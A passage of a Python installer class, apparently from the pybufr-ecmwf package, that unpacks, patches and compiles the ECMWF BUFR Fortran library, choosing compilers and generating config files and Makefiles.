preferred_c_compiler=None,\n fortran_compiler=None,\n fortran_ld_library_path=None,\n fortran_flags=None,\n c_compiler=None,\n c_ld_library_path=None,\n c_flags=None,\n set_jelem=None,\n debug_f2py_c_api=False):\n # #[\n\n # first remove any quotes that may be around the strings\n # (this may happen if the user uses quotes in the setup.cfg file)\n self.preferred_fortran_compiler = rem_quotes(preferred_fortran_compiler)\n self.preferred_c_compiler = rem_quotes(preferred_c_compiler)\n self.fortran_compiler = rem_quotes(fortran_compiler)\n self.fortran_ld_library_path = rem_quotes(fortran_ld_library_path)\n self.c_compiler = rem_quotes(c_compiler)\n self.c_ld_library_path = rem_quotes(c_ld_library_path)\n self.fortran_flags = rem_quotes(fortran_flags)\n self.c_flags = rem_quotes(c_flags)\n self.set_jelem = set_jelem\n self.debug_f2py_c_api = debug_f2py_c_api\n\n # save the verbose setting\n self.verbose = verbose\n\n # save the location to be used for installing the ECMWF BUFR library\n self.ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n\n # define the names of the library and shared object files\n # that will be created by this class\n self.bufr_lib_file = \"libbufr.a\"\n\n self.wrapper_build_dir = \"f2py_build\"\n self.wrapper_module_name = \"ecmwfbufr\"\n\n # init other module attributes to None\n self.fortran_compiler_to_use = None\n self.c_compiler_to_use = None\n\n # variable to store current integer sizes in c and Fortran\n self.integer_sizes = None\n # #]\n def build(self):\n # #[\n \"\"\"a method to start building the BUFR interface\"\"\"\n\n bufr_was_build = False\n wrapper_was_build = False\n\n # check for the presence of the library\n if os.path.exists(self.bufr_lib_file):\n print(\"BUFR library seems present\")\n else:\n print(\"Entering installation sequence:\")\n self.install()\n print(\"compilation of BUFR library finished\")\n bufr_was_build = True\n\n try:\n wrapper_name = glob.glob(SO_FILE_PATTERN)[0]\n except IndexError:\n wrapper_name = 'undefined'\n\n if os.path.exists(wrapper_name):\n print(\"python wrapper seems present\")\n else:\n print(\"Entering wrapper generation sequence:\")\n source_dir = self.get_source_dir()[0]\n self.generate_python_wrapper(source_dir)\n print(\"compilation of library wrapper finished\")\n wrapper_was_build = True\n\n if (not bufr_was_build) and (not wrapper_was_build):\n print(\"\\nNothing to do\\n\"+\n \"Execute the clean.py tool if you wish to start again \"+\n \"from scratch.\")\n\n print('extracting library constants')\n self.extract_constants()\n\n print('storing version info')\n extract_version()\n\n print('copying sample files')\n self.copy_sample_files()\n # #]\n def rebuild(self):\n # #[ rebuild the software\n \"\"\" same as install, but always run the make, even if the\n wrapper library already seems present\"\"\"\n self.install(remake=True)\n source_dir = self.get_source_dir()[0]\n self.generate_python_wrapper(source_dir, remake=True)\n # #]\n def clean(self):\n # #[\n \"\"\" a method to clean-up things that I don't want to have\n included in the binary/rpm distributions.\"\"\"\n\n # if verbose is set this signals we are debugging the\n # code, so do not remove temp folders in that case\n #if self.verbose:\n return\n\n # this is a bit of a dirty hack.\n # It removes the subdir ecmwf_bufr_lib and everything below\n # to prevent it to be included in the binary/rpm distributions\n # There should be a nicer way to do this, but I have not\n # yet found it ...\n\n dirs_to_remove = [self.ecmwf_bufr_lib_dir,\n self.wrapper_build_dir]\n\n for 
dir_to_remove in dirs_to_remove:\n if os.path.exists(dir_to_remove):\n cmd = r'\\rm -rf '+dir_to_remove\n print(\"executing command: \", cmd)\n os.system(cmd)\n # #]\n def use_bundled_library_copy(self):\n # #[\n \"\"\" copy the bundled version\n of the library sources stored in ecmwf_bufr_lib_sources.\n We must descend the directory tree first to find the root\n before doing this copy. \"\"\"\n\n # make sure the destination dir exists\n if not os.path.exists(self.ecmwf_bufr_lib_dir):\n os.makedirs(self.ecmwf_bufr_lib_dir)\n\n cwd = os.getcwd()\n absdirname = os.path.abspath(cwd)\n while absdirname != \"/\":\n files = os.listdir(absdirname)\n if \"setup.cfg\" in files:\n pattern = os.path.join(absdirname,\n 'ecmwf_bufr_lib_sources',\n 'bufrdc_000*.tar.gz')\n tgz_filelist = glob.glob(pattern)\n if len(tgz_filelist) > 0:\n tgz_file = tgz_filelist[0]\n\n cmd = 'cp '+tgz_file+' '+self.ecmwf_bufr_lib_dir\n print(\"Executing command: \", cmd)\n os.system(cmd)\n break\n\n base = os.path.split(absdirname)[0]\n absdirname = base\n\n # return to the original location\n os.chdir(cwd)\n # #]\n def use_bundled_tables_dir_copy(self):\n # #[\n \"\"\" copy the bundled version of the updated bufr tables\n in ecmwf_bufr_lib_sources.\n We must descend the directory tree first to find the root\n before doing this copy. \"\"\"\n\n # make sure the destination dir exists\n if not os.path.exists(self.ecmwf_bufr_lib_dir):\n os.makedirs(self.ecmwf_bufr_lib_dir)\n\n cwd = os.getcwd()\n absdirname = os.path.abspath(cwd)\n while absdirname != \"/\":\n files = os.listdir(absdirname)\n if \"setup.cfg\" in files:\n pattern = os.path.join(absdirname,\n 'ecmwf_bufr_lib_sources',\n 'bufrdc_tables*.tar.gz')\n tgz_filelist = glob.glob(pattern)\n if len(tgz_filelist) > 0:\n tgz_file = tgz_filelist[-1] # take the newest file\n\n cmd = 'cp '+tgz_file+' '+self.ecmwf_bufr_lib_dir\n print(\"Executing command: \", cmd)\n os.system(cmd)\n break\n else:\n errtxt = ('Sorry, could not find replacement bufr tables '+\n 'tar file. Something seems wrong with '+\n 'this installation.')\n raise LibraryBuildError(errtxt)\n\n base = os.path.split(absdirname)[0]\n absdirname = base\n\n # return to the original location\n os.chdir(cwd)\n # #]\n def get_source_dir(self):\n # #[\n \"\"\" a method to find the name of the current BUFR library\n sources (after unpacking the tarball), and also the name\n of the current tarball.\"\"\"\n\n # save the location to be used for installing the ECMWF BUFR library\n ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n list_of_bufr_tarfiles = glob.glob(os.path.join(ecmwf_bufr_lib_dir,\n \"bufrdc_000*.tar.gz\"))\n\n # safety catch\n if len(list_of_bufr_tarfiles) == 0:\n return (None, None)\n\n # sort in reverse alphabetical order to get the newest one on top\n list_of_bufr_tarfiles.sort(reverse=True)\n if self.verbose:\n print(\"available library tarfiles: \", list_of_bufr_tarfiles)\n print(\"most recent library tarfile: \", list_of_bufr_tarfiles[0])\n\n tarfile_to_install = os.path.split(list_of_bufr_tarfiles[0])[1]\n\n # find out the actual name of the library source directory\n # after unpacking. 
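# --- editor's sketch ----------------------------------------------------------
# The technique used below -- reading the member list of the tarball to learn
# its top-level directory without unpacking it -- can be isolated as a small
# helper (illustrative only; the installer does the same thing inline):
import tarfile

def top_level_dir(tgz_path):
    # the ECMWF bufrdc tarballs keep everything under a single directory,
    # so the first member name is taken to be that directory
    with tarfile.open(tgz_path, 'r:gz') as archive:
        return archive.getnames()[0]
# ------------------------------------------------------------------------------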
Use the tarfile module and look inside:\n tarfile_obj = tarfile.open(list_of_bufr_tarfiles[0], 'r:gz')\n names = tarfile_obj.getnames()\n #print(\"names[0:5] = \", names[0:5])\n # this library holds everything in a single subdirectory named something\n # like bufr_000380, so I guess it is safe to assume that the first name\n # in the archive will be the name of this directory.\n bufr_dir = names[0]\n tarfile_obj.close()\n\n source_dir = os.path.join(ecmwf_bufr_lib_dir, bufr_dir)\n\n return (source_dir, tarfile_to_install)\n # #]\n def get_tables_source_dir(self):\n # #[\n \"\"\" a method to find the name of the current BUFR tables\n sources (after unpacking the tarball), and also the name\n of the current tarball.\"\"\"\n\n # save the location to be used for installing the ECMWF BUFR library\n ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n list_of_bufr_tables_tarfiles = \\\n glob.glob(os.path.join(ecmwf_bufr_lib_dir,\n \"bufrdc_tables*.tar.gz\"))\n\n # safety catch\n if len(list_of_bufr_tables_tarfiles) == 0:\n return (None, None)\n\n # sort in reverse alphabetical order to get the newest one on top\n list_of_bufr_tables_tarfiles.sort(reverse=True)\n if self.verbose:\n print(\"available bufr tables tarfiles: \",\n list_of_bufr_tables_tarfiles)\n print(\"most recent bufr_tables tarfile: \",\n list_of_bufr_tables_tarfiles[0])\n\n tarfile_to_install = os.path.split(list_of_bufr_tables_tarfiles[0])[1]\n\n # find out the actual name of the bufr tables source directory\n # after unpacking. Use the tarfile module and look inside:\n tarfile_obj = tarfile.open(list_of_bufr_tables_tarfiles[0], 'r:gz')\n names = tarfile_obj.getnames()\n # print(\"names[0:5] = \", names[0:5])\n\n # get the dir name from the second element in the list\n bufr_tables_dir = os.path.split(names[1])[0]\n tarfile_obj.close()\n\n bufr_tables_dir = os.path.join(ecmwf_bufr_lib_dir, bufr_tables_dir)\n\n # print('bufr_tables_dir = ', bufr_tables_dir)\n # print('tarfile_to_install = ', tarfile_to_install)\n # sys.exit(1)\n \n return (bufr_tables_dir, tarfile_to_install)\n # #]\n def install(self, remake=False):\n # #[\n \"\"\" a method to compile the ECMWF BUFR library \"\"\"\n\n if not remake:\n # #[ find and unpack the ECMWF BUFR library tar file\n\n # first see if there is already a tarfile available\n # (the user may have provided one)\n (source_dir, tarfile_to_install) = self.get_source_dir()\n\n if source_dir is None:\n # copy the bundled version\n # of the library sources stored in ecmwf_bufr_lib_sources\n print('Using bundled library copy...')\n self.use_bundled_library_copy()\n \n # retry (now we should have a copy of the tarfile)\n (source_dir, tarfile_to_install) = self.get_source_dir()\n else:\n # debug print\n # print('(source_dir, tarfile_to_install) = ',\n # (source_dir, tarfile_to_install))\n pass\n\n # safety catch\n if source_dir is None:\n print(\"ERROR: extracting source_dir failed\")\n raise LibraryBuildError\n\n if not os.path.exists(source_dir):\n # safety catch\n if tarfile_to_install == None:\n print(\"ERROR: no tarfile available for BUFR library.\")\n raise LibraryBuildError\n\n if self.verbose:\n cmd = \"cd \"+self.ecmwf_bufr_lib_dir+\\\n \";tar zxvf \"+tarfile_to_install\n else:\n cmd = \"cd \"+self.ecmwf_bufr_lib_dir+\\\n \";tar zxf \"+tarfile_to_install\n \n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n print(\"path exists: \", source_dir)\n print(\"assuming the package is already unpacked...\")\n\n # extract numerical BUFR library version\n # this should be something like: 
bufrdc_000389\n try:\n bufr_dir = os.path.split(source_dir)[1]\n parts = bufr_dir.split('_')\n if len(parts) > 1:\n bufrdir_version = int(parts[1])\n else:\n # exception seems needed for version 000401\n # which unpacks as 000401 without bufrdc_ prepended\n bufrdir_version = int(parts[0])\n # print('bufr_dir = ',bufr_dir)\n # print('bufrdir_version = ',bufrdir_version)\n except:\n print('ERROR: could not extract numerical BUFR library')\n print('version number ...')\n print('Please report this bug.')\n raise ProgrammingError\n # #]\n # #[ add a few small fortran routines\n add_fortran_dir_list = \\\n descend_dirpath_and_find(os.getcwd(),\n 'additional_fortran_code')[1]\n\n add_fortran_dir = add_fortran_dir_list[0]\n\n additional_fortran_files = ['handle_stdout.F',\n 'retrieve_settings.F',\n #'add_debug_code.F',\n 'reset_global_variables.F',\n 'set_nokey.F']\n for fortr_file in additional_fortran_files:\n shutil.copy(os.path.join(add_fortran_dir, fortr_file),\n os.path.join(source_dir, 'bufrdc', fortr_file))\n print('copied file: '+fortr_file)\n\n # add these new source files to the sources list to include it in\n # the compilation and library creation procedure\n\n sources_file = os.path.join(source_dir, 'bufrdc', 'sources')\n fds = open(sources_file, 'r')\n sources_lines = fds.readlines()\n fds.close()\n\n # save the original with a modified name\n os.system('mv '+sources_file+' '+sources_file+'.orig')\n\n fds = open(sources_file, 'w')\n fds.write(''.join(line for line in sources_lines[:5]))\n for fortr_file in additional_fortran_files:\n fds.write(' '+fortr_file+' \\\\\\n')\n print('added file '+fortr_file+' to the sources list')\n fds.write(''.join(line for line in sources_lines[5:]))\n fds.close()\n # #]\n # #[ force value of jelem if desired\n if self.set_jelem is not None:\n param_file = os.path.join(source_dir, 'bufrdc',\n 'parameter.F')\n print('paramfile: ', param_file)\n os.rename(param_file, param_file+'.orig')\n fds_in = open(param_file+'.orig', 'rb')\n fds_out = open(param_file, 'wb')\n for line in fds_in.readlines():\n print(line)\n if b'JELEM=' in line:\n part1 = line.split(b'JELEM=')[0]+b'JELEM='\n part2 = b',JSUBS='+line.split(b',JSUBS=')[1]\n replaced_line = part1+str(self.set_jelem)+part2\n print('Replacing line: [{}]'.format(line.strip()))\n print(' by line: [{}]'.\n format(replaced_line.strip()))\n fds_out.write(replaced_line)\n else:\n fds_out.write(line)\n fds_in.close()\n fds_out.close()\n os.chmod(param_file, 0o755)\n # #]\n # #[ install bufr tables update package\n print('source_dir = ', source_dir)\n tables_dir = os.path.join(source_dir, 'bufrtables')\n\n #print('deleting original tables dir')\n #shutil.rmtree(tables_dir)\n print('renaming original tables dir')\n shutil.move(tables_dir, tables_dir+'.orig')\n\n # get a copy of the bundled replacement tables dir\n # and place it in the ecmwf_bufr_lib dir\n self.use_bundled_tables_dir_copy()\n\n (replacement_bufr_tables_dir, tables_tarfile_to_install) = \\\n self.get_tables_source_dir()\n print('replacement_bufr_tables_dir = ',\n replacement_bufr_tables_dir)\n print('tables_tarfile_to_install = ',\n tables_tarfile_to_install)\n\n print('unpack replacement bufr tables dir')\n ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n cmd = ('cd '+ecmwf_bufr_lib_dir+\n ';tar xvfz '+tables_tarfile_to_install)\n print('Executing: ', cmd)\n os.system(cmd)\n\n # ensure permissions are sane\n # (version 000412 has no write permission, which\n # breaks the clean command...)\n cmd = 'chmod -R u+w '+replacement_bufr_tables_dir\n 
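# --- editor's sketch ----------------------------------------------------------
# Note on the parameter.F patch above: the file is opened in 'rb'/'wb' mode,
# so every piece being written must be bytes. On Python 3 the expression
# part1 + str(self.set_jelem) + part2 concatenates bytes with str and raises
# TypeError; the new value needs an explicit encode. A bytes-safe version of
# that splice (patch_jelem is an illustrative name, not installer code):
def patch_jelem(line, new_jelem):
    # line is a bytes object containing b'...JELEM=<old>,JSUBS=...'
    head = line.split(b'JELEM=')[0] + b'JELEM='
    tail = b',JSUBS=' + line.split(b',JSUBS=')[1]
    return head + str(new_jelem).encode('ascii') + tail
# ------------------------------------------------------------------------------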
print('Executing: ', cmd)\n os.system(cmd)\n \n # rename the bufr tables dir to put it in the right location\n cmd = 'mv '+replacement_bufr_tables_dir+' '+tables_dir\n print('Executing: ', cmd)\n os.system(cmd)\n # #]\n\n # #[ apply a smal patch to the 000409 test.sh script\n # this patch ensures the correct bufrtables directory is used\n # during execution of this test script\n # Reported to ECMWF in jira issue SUP-1727\n if tarfile_to_install == 'bufrdc_000409.tar.gz':\n scr_file = os.path.join(source_dir, 'test.sh')\n os.rename(scr_file, scr_file+'.orig')\n fds_in = open(scr_file+'.orig', 'rb')\n fds_out = open(scr_file, 'wb')\n for line in fds_in.readlines():\n if not ( (b'set -ex' in line) or\n (b'BUFR_TABLES=/var/tmp' in line) ):\n fds_out.write(line)\n fds_in.close()\n fds_out.close()\n os.chmod(scr_file, 0o755)\n # #]\n # #[ apply a smal patch to the Makefile\n # this patch disables execution of the tables_tools/check_tables.sh\n # test script during the make stage, because it fails for\n # this bufr tables update package due to minor table formatting\n # problems (which are probably not noticed at all by the fortran\n # and python code, but the regexp in the perl check script\n # stumbles on this problem).\n # Reported to ECMWF in jira issue SUP-2096\n if tables_tarfile_to_install in \\\n ['bufrdc_tables-4.1.1-Source.tar.gz',\n 'bufrdc_tables-4.1.2.tar.gz']:\n for fn in ['Makefile', 'Makefile.in']:\n mk_file = os.path.join(source_dir, fn)\n if os.path.exists(mk_file):\n print('Modifying: ', mk_file)\n os.rename(mk_file, mk_file+'.orig')\n fds_in = open(mk_file+'.orig', 'rb')\n fds_out = open(mk_file, 'wb')\n for line in fds_in.readlines():\n if not b'check_tables.sh' in line:\n fds_out.write(line)\n fds_in.close()\n fds_out.close()\n os.chmod(mk_file, 0o755)\n # #]\n \n # #[ find a suitable fortran compiler to use\n\n #if (self.verbose):\n print('selection fortran compiler')\n print('==>input: self.fortran_compiler = ', self.fortran_compiler)\n print('==>input: self.preferred_fortran_compiler = ',\n self.preferred_fortran_compiler)\n\n # first check a possible custom executable, passed in\n # through the setup.cfg file or on the commandline\n is_present = self.check_presence(self.fortran_compiler)\n if is_present:\n self.fortran_compiler_to_use = 'custom'\n\n # the first one found will be used, unless a preferred one is specified.\n for f_compiler in POSSIBLE_F_COMPILERS:\n if self.preferred_fortran_compiler == f_compiler:\n if self.check_presence(f_compiler):\n self.fortran_compiler_to_use = f_compiler\n break # stop the for loop\n\n if self.fortran_compiler_to_use is None:\n # a sanity check\n if self.preferred_fortran_compiler is not None:\n if not (self.preferred_fortran_compiler in\n POSSIBLE_F_COMPILERS):\n print(\"ERROR: unknown preferred fortran compiler \"+\n \"specified:\",\n self.preferred_fortran_compiler)\n print(\"valid options are: \",\n \", \".join(s for s in POSSIBLE_F_COMPILERS))\n raise NotImplementedError\n\n print(\"preferred fortran compiler [\"+\n str(self.preferred_fortran_compiler)+\n \"] seems not available...\")\n print(\"falling back to default fortran compiler\")\n\n for f_compiler in POSSIBLE_F_COMPILERS:\n is_present = self.check_presence(f_compiler)\n if is_present:\n self.fortran_compiler_to_use = f_compiler\n break # stop the for loop\n\n if self.fortran_compiler_to_use is None:\n print(\"ERROR: no valid fortran compiler found,\")\n print(\"installation is not possible\")\n print(\"Please install a fortran compiler first.\")\n print(\"Good options 
are the free GNU compilers\")\n print(\"gfortran and g95 which may be downloaded free of charge.\")\n print(\"(see: http://gcc.gnu.org/fortran/ \")\n print(\" and: http://www.g95.org/ )\")\n raise EnvironmentError\n\n #if (self.verbose):\n print('selection fortran compiler')\n print('==>result: self.fortran_compiler_to_use = ',\n self.fortran_compiler_to_use)\n\n # #]\n\n # #[ find a suitable c compiler to use\n\n #if (self.verbose):\n print('selection c compiler')\n print('==>input: self.c_compiler = ', self.c_compiler)\n print('==>input: self.preferred_c_compiler = ',\n self.preferred_c_compiler)\n\n # first check a possible custom executable, passed in\n # through the setup.cfg file or on the commandline\n is_present = self.check_presence(self.c_compiler)\n if is_present:\n self.c_compiler_to_use = 'custom'\n\n # the first one found will be used, unless a preferred one is specified.\n for c_compiler in POSSIBLE_C_COMPILERS:\n if self.preferred_c_compiler == c_compiler:\n if self.check_presence(c_compiler):\n self.c_compiler_to_use = c_compiler\n break # stop the for loop\n\n if self.c_compiler_to_use is None:\n # a sanity check\n if self.preferred_c_compiler is not None:\n if self.preferred_c_compiler not in POSSIBLE_C_COMPILERS:\n print(\"ERROR: unknown preferred c compiler \"+\n \"specified:\",\n self.preferred_c_compiler)\n print(\"valid options are: \",\n \", \".join(s for s in POSSIBLE_C_COMPILERS))\n raise NotImplementedError\n\n if self.preferred_c_compiler is None:\n print(\"no preferred c compiler given\")\n else:\n print(\"preferred c compiler [\"+\n str(self.preferred_c_compiler)+\n \"] seems not available...\")\n print(\"falling back to default c compiler\")\n\n for c_compiler in POSSIBLE_C_COMPILERS:\n is_present = self.check_presence(c_compiler)\n if is_present:\n self.c_compiler_to_use = c_compiler\n break # stop the for loop\n\n if self.c_compiler_to_use is None:\n print(\"ERROR: no valid c compiler found,\")\n print(\"installation is not possible\")\n print(\"Please install a c compiler first.\")\n print(\"A good option is the free GNU compiler gcc\")\n print(\"which may be downloaded free of charge.\")\n print(\"(see: http://gcc.gnu.org/ )\")\n raise EnvironmentError\n\n #if (self.verbose):\n print('selection c compiler')\n print('==>result: self.c_compiler_to_use = ', self.c_compiler_to_use)\n\n # #]\n\n # #[ add the custom LD_LIBRARY_PATH settings\n libpath = \"\"\n if self.fortran_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.fortran_ld_library_path]\n if s != \"\")\n if self.c_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.c_ld_library_path]\n if s != \"\")\n\n if libpath != \"\":\n print(\"Using LD_LIBRARY_PATH setting: \", libpath)\n # #]\n\n if not remake:\n # #[ generate a config file for compilation of the BUFR library\n\n #------------------------------------------------------------------#\n # Possible commands to the make command for the BUFR library, #\n # in case you wish to use the config files from the ECMWF software #\n # package are: (see the README file within source_dir) #\n # - architecture: ARCH=sgimips (or: decalpha,hppa,linux,rs6000, #\n # sun4) #\n # - 64 bit machine: R64=R64 #\n # - compiler name (only for linux or sun machines): CNAME=_gnu #\n # #\n #------------------------------------------------------------------#\n\n # NOTE that for the linux case the library has some hardcoded\n # switches to use 32-bit variables in its interfacing (at least\n # last time I looked), so DO NOT try 
to use the 64 bit option on\n # linux, even if you have a 64-bit processor and compiler\n # available !\n # Even if the code runs, it will fail miserably and cause\n # segmentation faults if you are lucky, or just plain nonsense\n # if you are out of luck ....\n # (see the files bufrdc_000400/bufrdc/fortint.h and\n # bufrdc_000400/pbio/fortint.h which hardcode JBPW_DEF to be 32\n # (JBPW defines number of bits per word to be used)\n\n # The following 4 settings determine the name of the config file\n # used by the Make command; look in the file\n # ecmwf_bufr_lib/bufr_000380/config/ to see all available versions.\n\n # ARCH=\"linux\"\n # CNAME=\"_compiler\"\n # R64=\"\"\n # A64=\"\"\n\n # note: usefull free compilers for linux that you can use are:\n # (at least for these config files are provided in the ECMWF BUFR\n # package)\n # g77 : CNAME=\"_gnu\"\n # g95 : CNAME=\"_g95\"\n # gfortran : CNAME=\"_gfortran\"\n\n # Notes on compiler switches:\n\n # for most compilers you should force the BUFR library to use 4 byte\n # integers as default integer. Do this by adding the \"-i4\" option.\n # This works for most compilers, with gfortran as known exception\n # (that one has this setting as default and does not have a\n # commandline option to set it)\n\n # it seems the c compiler step needs the \"-DFOPEN64\" switch to be\n # set (at least it is present in most config files in the package)\n # but it is never used in the source code itself, so I guess it is\n # obsolete.\n\n fcmp = ''\n fflags = ''\n\n if self.fortran_compiler_to_use == 'custom':\n fcmp = self.fortran_compiler\n fflags = ' '.join(flags for flags in FFLAGS_COMMON)\n else:\n fcmp = self.fortran_compiler_to_use\n fflags_to_use = FFLAGS_NEEDED[fcmp]\n\n # exception for gfortran v10+\n if fcmp == 'gfortran':\n version_file = 'gfortran_version.txt'\n cmd = '{} --version > {}'.format(fcmp, version_file)\n os.system(cmd)\n with open(version_file, 'rt') as fd_ver:\n line = fd_ver.readline()\n parts = line.split()\n version = parts[3]\n version_major = int(version.split('.')[0])\n\n if version_major >= 10:\n fflags_to_use = FFLAGS_NEEDED['gfortran_10']\n\n fflags = ' '.join(flags for flags in fflags_to_use)\n\n # add any custom flags given by the user\n if self.fortran_flags != None:\n fflags = fflags + ' ' + self.fortran_flags\n\n if self.c_compiler_to_use == 'custom':\n ccmp = self.c_compiler\n cflags = ' '.join(flags for flags in CFLAGS_COMMON)\n else:\n ccmp = self.c_compiler_to_use\n cflags = ' '.join(flags for flags in CFLAGS_NEEDED[ccmp])\n\n # add any custom flags given by the user\n if self.c_flags != None:\n cflags = cflags+' '+self.c_flags\n\n # no check implemented on the \"ar\" and \"ranlib\" commands yet\n # (easy to add if we woould need it)\n\n # a command to generate an archive (*.a) file\n arcmd = \"ar\"\n # a command to generate an index of an archive file\n rlcmd = \"/usr/bin/ranlib\"\n\n # Unfortunately, the config files supplied with this library seem\n # somewhat outdated and sometimes incorrect, or incompatible with\n # the current compiler version (since they seem based on some\n # older compiler version, used some time ago at ECMWF, and never\n # got updated). 
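# --- editor's sketch ----------------------------------------------------------
# The gfortran>=10 detection above shells out to 'gfortran --version', writes
# the banner to a file, and takes the fourth whitespace token, which is
# sensitive to the exact banner layout. A regex over the first line is a
# little more tolerant of vendor strings (illustrative only, not the code
# this installer runs):
import re
import subprocess

def gfortran_major_version(fcmp='gfortran'):
    banner = subprocess.check_output([fcmp, '--version']).decode('utf-8')
    match = re.search(r'(\d+)\.\d+(\.\d+)?', banner.splitlines()[0])
    return int(match.group(1)) if match else None

# e.g. a result >= 10 selects the '-fallow-argument-mismatch' flag set
# ------------------------------------------------------------------------------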
This especially is true for the g95 compiler.\n # Therefore we have decided (at KNMI) to create our own\n # custom config file in stead.\n # We just call it: config.linux_compiler\n # which seems safe for now, since ECMWF doesn't use that name.\n\n arch = \"linux\"\n cname = \"_compiler\"\n r64 = \"\"\n a64 = \"\"\n\n # construct the name of the config file to be used\n config_file = \"config.\"+arch+cname+r64+a64\n fullname_config_file = os.path.join(source_dir, \"config\",\n config_file)\n\n # this check is only usefull if you use one of the existing\n # config files\n #if not os.path.exists(fullname_config_file):\n # # see if a version with \".in\" extension is present\n # # and if so, symlink to it.\n # if not os.path.exists(fullname_config_file+\".in\"):\n # print(\"ERROR: config file not found: \",\n # fullname_config_file)\n # raise IOError\n # else:\n # os.symlink(config_file+\".in\", fullname_config_file)\n\n # create our custom config file:\n print(\"Using: \"+fcmp+\" as fortran compiler\")\n print(\"Using: \"+ccmp+\" as c compiler\")\n\n print(\"Creating ECMWF-BUFR config file: \", fullname_config_file)\n cfd = open(fullname_config_file, 'w')\n cfd.write(\"# Generic configuration file for linux.\\n\")\n cfd.write(\"AR = \"+arcmd+\"\\n\")\n cfd.write(\"ARFLAGS = rv\\n\")\n cfd.write(\"CC = \"+ccmp+\"\\n\")\n cfd.write(\"CFLAGS = \"+cflags+\"\\n\")\n cfd.write(\"FASTCFLAGS = \"+cflags+\"\\n\")\n cfd.write(\"FC = \"+fcmp+\"\\n\")\n cfd.write(\"FFLAGS = \"+fflags+\"\\n\")\n cfd.write(\"VECTFFLAGS = \"+fflags+\"\\n\")\n cfd.write(\"RANLIB = \"+rlcmd+\"\\n\")\n cfd.close()\n\n # create a backup copy in the ecmwf_bufr_lib_dir\n source = fullname_config_file\n destination = os.path.join(self.ecmwf_bufr_lib_dir, \"config_file\")\n shutil.copyfile(source, destination)\n # #]\n\n if (not remake) and (bufrdir_version > 387):\n # #[ generate fortran2c config file for newer bufr versions\n # fortran2c_compiler contains the extra libraries needed\n # to link the objects created with the current fortran\n # compiler with a main program created with the\n # current c-compiler\n fortran2c_name = 'fortran2c_compiler'\n fortran2c_target = os.path.join(source_dir, \"config\",\n fortran2c_name)\n fortran2c_source = None\n if self.fortran_compiler_to_use == 'g95':\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c_g95')\n shutil.copyfile(fortran2c_source, fortran2c_target)\n\n if self.fortran_compiler_to_use == 'gfortran':\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c_gfortran')\n # just copying the provided file fails for me\n # (gfortran 4.7.x also needs -lm during the link stage)\n #shutil.copyfile(fortran2c_source, fortran2c_target)\n fd_f2c = open(fortran2c_target, 'w')\n fd_f2c.write('FORTRAN2C = -lgfortran -lm')\n fd_f2c.close()\n\n if self.fortran_compiler_to_use == 'pgf90':\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c')\n shutil.copyfile(fortran2c_source, fortran2c_target)\n\n if fortran2c_source is None:\n fortran2c_source = os.path.join(source_dir, \"config\",\n 'fortran2c_gnu')\n shutil.copyfile(fortran2c_source, fortran2c_target)\n\n # #]\n # #[ generate the makefile for newer bufr versions\n # bufr library versions 000388 and newer have changed the\n # build and install procedure. They have a new 'build_library'\n # script that tries to guess system parameters and then\n # creates the Makefile from Makefile.in by applying a series\n # of 'sed' commands. 
However, this script is interactive and\n # asks the use several questions. Therefore this python\n # script bypasses this build_library script and tries to do\n # the same for linux without user intervention\n\n # makefiles are created from Makefile.in\n # in these directories:\n makefile_dirs = ['.', 'bufrdc', 'bufrtables', 'pbio', 'fortranC',\n 'examples', 'synop2bufr',\n 'synop2bufr/station_list']\n install_dir = 'dummy' # seems never used in the makefiles\n replacements = [('%reals%', r64),\n ('%install_dir%', install_dir),\n ('%arch%', arch),\n ('%comp%', cname),\n ('%plat%', a64),\n ('%depl%', 'bufr')]\n for makefile_dir in makefile_dirs:\n makefile = os.path.join(source_dir, makefile_dir, 'Makefile')\n makefile_template = makefile+'.in'\n if os.path.exists(makefile_template):\n print('creating: ', makefile)\n fd_makefile = open(makefile, 'w')\n for line in open(makefile_template).readlines():\n line_new = line\n # print('adapting line: ',line)\n for (old, new) in replacements:\n line_new = line_new.replace(old, new)\n fd_makefile.write(line_new)\n fd_makefile.close()\n # #]\n\n # #[ compile little pieces of Fortran and c to test the compilers\n fortran_compile_test(fcmp, fflags, libpath)\n c_compile_test(ccmp, cflags, libpath)\n # #]\n\n # #[ retrieve integer sizes for c and fortran\n self.integer_sizes = retrieve_integer_sizes(ccmp, cflags, libpath,\n fcmp, fflags, libpath)\n # #]\n\n # #[ now use the make command to build the library\n\n # construct the compilation command:\n cmd = \"cd \"+source_dir+\";make ARCH=\"+arch+\" CNAME=\"+\\\n cname+\" R64=\"+r64+\" A64=\"+a64\n #if not self.verbose:\n cmd += \" 2>1 > bufrdc_build.log\"\n\n # now issue the Make command\n if libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n #(lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, libpath = libpath)\n run_shell_command(cmd, libpath=libpath, catch_output=False)\n # #]\n # #[ scan the build log for possible problems\n logfile = os.path.join(source_dir, 'bufrdc_build.log')\n text = b''\n if os.path.exists(logfile):\n fds = open(logfile,'rb')\n text = fds.read()\n fds.close() \n problem_detected = False\n if b'failed' in text:\n problem_detected = True\n if b'FAILED' in text:\n problem_detected = True\n\n if problem_detected:\n print('\\n\\n')\n print('A problem was detected in the logfile: {0}'.\n format(os.path.join(os.getcwd(), logfile)))\n print(\"Please investigate it or send it to the developer of\")\n print(\"this module for analysis.\")\n print(\"Build failed, aborting\")\n sys.exit(1)\n\n # #]\n # #[ check the result and move the library file\n fullname_bufr_lib_file = os.path.join(source_dir, self.bufr_lib_file)\n if os.path.exists(fullname_bufr_lib_file):\n print(\"Build seems successfull\")\n # remove any old library file that might be present\n if os.path.exists(self.bufr_lib_file):\n os.remove(self.bufr_lib_file)\n\n # move to a more convenient location\n shutil.move(fullname_bufr_lib_file, self.bufr_lib_file)\n ensure_permissions(self.bufr_lib_file, 'r')\n else:\n print(\"ERROR in bufr_interface_ecmwf.install:\")\n print(\"No libbufr.a file seems generated.\")\n raise 